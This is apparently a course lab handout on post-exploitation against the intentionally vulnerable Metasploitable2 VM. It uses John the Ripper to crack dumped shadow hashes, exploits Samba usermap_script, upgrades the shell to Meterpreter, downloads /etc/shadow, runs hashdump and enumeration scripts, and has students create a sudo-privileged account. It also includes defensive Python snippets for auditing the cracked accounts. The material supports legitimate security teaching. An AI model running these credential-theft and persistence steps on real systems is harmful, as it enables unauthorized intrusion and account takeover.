Lab 6 - Post-Exploitation
Activities
Part 1 - John the Ripper
Let's say you have password hashes from an earlier exploit (such as the password hashes obtained in Lab 5). While that was helpful by itself to see what usernames exist, it would be much more useful to have plaintext passwords, which could then be used to log onto other, unexploited systems. How can password hashes be converted to plaintext passwords?
John the Ripper is a password "security auditing and password recovery" tool that can also be used for brute force password cracking from hashes. This process can be much faster than network-based attacks that were tried previously with Hydra. There's no network delay waiting for the target response, no need to worry about overloading the target or setting off security alarms, and the hashing attempts can be heavily parallelized.
Run John the Ripper on the hashes you swiped from Metasploitable2. (Recall that back in Lab 5 you swiped the /etc/passwd and /etc/shadow files and then used the unshadow tool to merge those files into a single file.) John the Ripper has a bunch of rules for common password permutations based on usernames - maybe some of those will hit? Start with the SINGLE CRACK rule. This is for idiot passwords based on the login/GECOS information, but you might get lucky, and it's super fast to start with.
$ john --list=rules # Just to see all the different permutations possible
$ john --single metasploitable_logins.txt
Note that you don't have to provide a file in the "shadow" format - John the Ripper is perfectly capable of recognizing a wide variety of hash standards in a file with contents as simple as username:hash.
Deliverables:
- What is the password of the 'user' user?
- What is the password of the 'msfadmin' user?
- What is the password of the 'service' user?
We're making progress, but that didn't guess passwords for all of the accounts. Now run John the Ripper using a basic list of common passwords that ships with John.
$ john --wordlist=/usr/share/john/password.lst --rules metasploitable_logins.txt
Deliverables:
- What is the password of the 'sys' user?
- What is the password of the 'klog' user?
Note: John the Ripper is smart. If you re-run the command over the same input file, it won't bother running the same tests or trying to find passwords for usernames that it already knows. These are saved in ~/.john/john.pot. So, you can easily try multiple wordlists (e.g. small, medium, large, MASSIVE) and more complicated rules (i.e. permutations) on the same hashes.
If you want to see all the results of the password cracking on the file, and not just the most recent scan, do:
$ john --show metasploitable_logins.txt
# This will show results in the "passwd" format:
# username : password : UserID : GroupID : User Info : Home Directory : Default Shell
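The passwd-format lines that john --show prints are easy to turn into an audit report. The following is an added example (not part of the lab or of John the Ripper) that parses that output, skips the trailing "N password hashes cracked, M left" summary line, copes with a cracked password that itself contains a colon, and flags the findings a defender would act on first; the account names and passwords in it are constructed, not Metasploitable2's.

```python
import re

# Constructed sample of `john --show` output: made-up accounts and passwords,
# not Metasploitable2's. Cracked entries are in passwd format, uncracked
# accounts are omitted, and john ends with a summary line that is not an account.
SAMPLE_SHOW_OUTPUT = """\
alice:alice:1001:1001:Alice Example,,,:/home/alice:/bin/bash
dbadmin:Winter2009:0:0:DB Admin:/root:/bin/bash
svc_backup:back:up:1003:1003::/var/backups:/bin/sh

3 password hashes cracked, 2 left
"""

SUMMARY_RE = re.compile(r"^\d+ password hashes? cracked, \d+ left$")
FIELDS = ("user", "password", "uid", "gid", "gecos", "home", "shell")

def parse_john_show(text):
    """Return one dict per cracked account from `john --show` output."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or SUMMARY_RE.match(line):
            continue  # blank line or trailing summary
        parts = line.split(":")
        if len(parts) < 7:
            raise ValueError("not a passwd-format line: %r" % line)
        # A cracked password may itself contain ':'. The five fields after it
        # (uid, gid, gecos, home, shell) never do, so anchor on the right end.
        values = [parts[0], ":".join(parts[1:-5])] + parts[-5:]
        acct = dict(zip(FIELDS, values))
        acct["uid"], acct["gid"] = int(acct["uid"]), int(acct["gid"])
        accounts.append(acct)
    return accounts

def audit_cracked(accounts):
    """Findings a defender should act on first, as (user, issue) pairs."""
    findings = []
    for a in accounts:
        if a["uid"] == 0:
            findings.append((a["user"], "uid 0 account has a crackable password"))
        if a["password"].lower() == a["user"].lower():
            findings.append((a["user"], "password equals username"))
        if len(a["password"]) < 8:
            findings.append((a["user"], "password shorter than 8 characters"))
    return findings

if __name__ == "__main__":
    for user, issue in audit_cracked(parse_john_show(SAMPLE_SHOW_OUTPUT)):
        print("%-12s %s" % (user, issue))
```

To run it against real output, replace SAMPLE_SHOW_OUTPUT with the text of `john --show metasploitable_logins.txt`.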
Just the root password is left as a mystery... I tried the 134MB rockyou.txt wordlist (uncompressed from /usr/share/wordlists/rockyou.txt.gz), but without success. Some googling seems to indicate that this password is significantly harder to crack than the others.
Note that these are relatively short username and password lists, chosen so the runs go quickly. Metasploit comes with other files to choose from (see /usr/share/metasploit-framework/data/wordlists/) and any Pen Tester worth his or her salt will have their own curated password lists.
See Also: CrackStation.net has a 15GB (uncompressed) wordlist file: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
You can keep track of these credentials in Metasploit using the creds command. Add your best credential now (the msfadmin one, since we know it has sudo access) using the 'creds add' command. You will need to specify the username, password, and IP address/port/protocol/service that the login is for.
# Ensure PostgreSQL database is running
$ sudo service postgresql start
# Launch Metasploit Console
$ msfconsole
# Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2
msf6> creds add user:msfadmin password:XXXXXX address:xx.xx.xx.xx port:22 protocol:tcp service-name:ssh
Then you can search the credentials database later, either by host or by service.
msf6> creds -s ssh
msf6> creds xx.xx.xx.xx
Part 2 - Useful Post-Exploit Activities
After gaining shell access, you may want to perform some common tasks, such as creating a user account for your own use (rather than needing to rely on a fragile exploit for access each time), or scanning the network for other hosts that may be investigated next. This is referred to as enumeration. (See: Linux Enumeration Cheat Sheet)
Perform the following tasks on the Metasploitable2 VM via an exploit shell (any exploit will do). For each of these tasks, use only the software that is already present on the system. You are not allowed to use apt to install anything on the system.
Deliverables:
- For each task below, document each command or set of commands that you use. Don't be alarmed if the auto-grader isn't aware (yet!) of all the diversity of commands possible here.
Tip: Feel free to just log onto Metasploitable2 and try these out at the terminal. However, all of your answers must be runnable via the exploit shell, so test them at the end to make sure.
Warning: The installed programs and configuration are different between your Kali Linux and Metasploitable2 Linux VMs. Ensure that your commands actually work in the Metasploitable2 VM and accomplish the desired result!
Task 1: Grant Yourself Access: Get a list of all local users
Task 2: Grant Yourself Access: Get a list of all users with sudo access (i.e. root access). Note that, in Metasploitable2, the relevant group is called "admin", whereas in some other Linux distributions the relevant group is called "sudo".
Task 3: Grant Yourself Access: Create a new account with the username "tiger" and password "roar"
Task 4: Grant Yourself Access: Grant the "tiger" account sudo permissions
Task 5: Revoke Access: Remove sudo permissions from "tiger"
Task 6: Revoke Access: Remove the user "tiger"
Task 7: Revoke Your Access: Remove the group "tiger"
Task 8: Find out what shell you are running in via the exploit
Task 9: Do a network scan to detect other active hosts within a specific subnet that respond to ICMP pings. The intent in a pentest would be to scan inside the corporate network from your pivot machine. For testing, use either the 45.33.32.154/24 subnet (when off-campus) or the 10.10.4.0/24 subnet (when on-campus). Note that you are not allowed to use nmap for this, since Nmap won't be installed on many exploited systems.
Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command...
Task 10: Do a reverse DNS scan to find the hostnames for other hosts within the subnet you used above (either 45.33.32.154/24 or 10.10.4.0/24). The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don't have a virtual network at the moment, we're using this testing subnet instead. Note that you are not allowed to use nmap for this, since Nmap won't be installed on many exploited systems.
Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command...
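The check behind Task 2 (who is effectively root) is the same one a defender runs when reviewing a host, and a plain grep of /etc/group misses one case: an account whose primary GID in /etc/passwd is the admin group but which is not listed on the group's line. The following is an added example, not part of the lab, meant to run on the Kali side against copies of /etc/passwd and /etc/group pulled from the target (it assumes those copies are available); the accounts in it are constructed, not Metasploitable2's, and it checks the "admin", "sudo" and "wheel" group names so it generalizes across distributions.

```python
# Constructed excerpts of /etc/passwd and /etc/group (made-up accounts, not the
# real Metasploitable2 files). "ops" has the admin group as its primary GID in
# /etc/passwd but is not listed in /etc/group, the case a grep of /etc/group misses.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sysadm:x:1000:1000:Sys Admin,,,:/home/sysadm:/bin/bash
toor:x:0:0:backup root:/root:/bin/bash
ops:x:1001:119:Ops,,,:/home/ops:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/false
"""
SAMPLE_GROUP = """\
root:x:0:
admin:x:119:sysadm
sudo:x:27:
www-data:x:33:
"""
# "admin" on Metasploitable2 and older Ubuntu, "sudo" on newer Debian/Ubuntu,
# "wheel" on RHEL-style systems; audit all three, skipping any that do not exist.
PRIVILEGED_GROUPS = ("admin", "sudo", "wheel")

def parse_colon_file(text, nfields):
    """Split a passwd/group style file into rows of exactly nfields strings."""
    rows = []
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            rows.append(line.split(":", nfields - 1))
    return rows

def privileged_accounts(passwd_text, group_text):
    """Map each root-equivalent account to the list of reasons it qualifies."""
    users = {r[0]: (int(r[2]), int(r[3])) for r in parse_colon_file(passwd_text, 7)}
    groups = {r[0]: (int(r[2]), [m for m in r[3].split(",") if m])
              for r in parse_colon_file(group_text, 4)}
    found = {}
    def flag(user, why):
        found.setdefault(user, []).append(why)
    for user, (uid, _gid) in users.items():
        if uid == 0:
            flag(user, "uid 0")  # any UID 0 account is root, whatever its name
    for gname in PRIVILEGED_GROUPS:
        if gname not in groups:
            continue  # group absent on this distribution
        gid, members = groups[gname]
        for m in members:                            # supplementary membership
            flag(m, "member of " + gname)
        for user, (_uid, primary) in users.items():  # primary GID in /etc/passwd
            if primary == gid and user not in members:
                flag(user, "primary group " + gname)
    return found
```

Calling privileged_accounts() on the samples reports root and toor (uid 0), sysadm (member of admin) and ops (primary group admin), and nothing for www-data.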
Part 3 - Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Let's upgrade our shell with Meterpreter!
Reference: Upgrade a Normal Command Shell to a Metasploit Meterpreter
Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2
Use the Samba exploit from the last lab:
msf6> search type:exploit name:samba
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOST xx.xx.xx.xx
What payloads are available for this exploit?
msf6> show payloads
Hmm, no Meterpreter available. Well, let's get there via a two-step process. You can leave the payload as automatically selected here.
msf6> exploit
whoami
root
Now that you have a shell on the Metasploitable2 VM, send it to the background by pressing CTRL-Z and entering y when prompted.
Search for a post-exploit script to upgrade a shell to a Meterpreter shell, and then select it.
msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
Learn more about this post-exploit script and the options it needs set:
msf6> info
Of the options that this post-exploit script takes, the only missing one (that is required) is SESSION, which is the session to run this script on. What are our current sessions? (Should only be one, the one we just sent to the background)
msf6> sessions
msf6> set SESSION x
# where x = num of session you just backgrounded
Run this post-exploit script
msf6> exploit
msf6> <exploit runs...>
To use the new Meterpreter shell, get the list of sessions again. You should see a new session.
msf6> sessions
Deliverables:
- What is the "type" listed for this new session?
- What username is meterpreter running as on the remote system?
- What does that username mean in terms of our access to this system?
To interact with this new shell, use the "-i" flag for sessions:
msf6> sessions -i x
# where x = num of Meterpreter session you just created
Let's explore the capabilities of Meterpreter now that it's running on the Metasploitable2 VM.
View the help menu
meterpreter> ?
Obtain some high level information about the system Meterpreter is running on:
meterpreter> sysinfo
Deliverables:
- What is the OS reported?
- What is the (processor) architecture reported?
Browse the list of running processes to get a sense of what is running on the system.
meterpreter> ps
Deliverables:
- What is the process ID of Xtightvnc? (A VNC server)
Download the /etc/passwd and /etc/shadow files from Metasploitable2 to your Kali machine and save them in the /tmp directory, thus demonstrating yet another way to access files on the remote host.
meterpreter> download /etc/passwd /etc/shadow /tmp
Note: There's an UPLOAD command too!
Snoop through the ARP cache of the target host. This represents other systems on the local area network that the target has been in recent communication with. You might discover other systems worth examining next.
meterpreter> arp
To exit the meterpreter shell:
meterpreter> quit
Keep your original exploit shell running a little while longer...
Deliverables:
- What are the contents of the ARP cache? (Copy and paste into the table)
Part 4 - Post-Exploit Script
Metasploit has a number of "post-exploit" scripts that can be useful for data gathering purposes. What other post-exploit scripts exist for our Linux target?
msf6> search type:post platform:linux
Some (many?) of these look interesting, depending on what applications you think are running on the target system:
msf6> info post/linux/gather/enum_system
msf6> info post/linux/gather/enum_users_history
msf6> info post/linux/gather/hashdump
# ANOTHER way to get those password hashes
Deliverables:
- Use the hashdump post-exploit script to access the password hashes. (Tip: Does it require any environment variables to be set before running?) Where does the "unshadowed password file" get downloaded to on your local Kali system?
- Use the enum_system post-exploit script to access installed packages and services, log files, cron jobs, and other interesting system artifacts. What is the package version of the Apache Tomcat 5.5 engine that is installed? (According to the Ubuntu/Debian package manager labeling)
- Use the enum_users_history post-exploit script to access shell history, command history for various SQL servers, and the sudoers file, among other artifacts. What is the name of the configuration file that the "postgres" user edited using the "vim" text editor? (There are two files, either is acceptable)
Tip: Forget which artifact file contains what information? Do you want to see them in an organized list, preferably sorted/searchable by host? These scripts have been saving that information for you automatically.
msf6> loot
To exit your original exploit shell:
msf6> sessions
msf6> sessions -i x
# Where x = num of your original exploit
msf6> CTRL-C, followed by 'y' when prompted to Abort Session?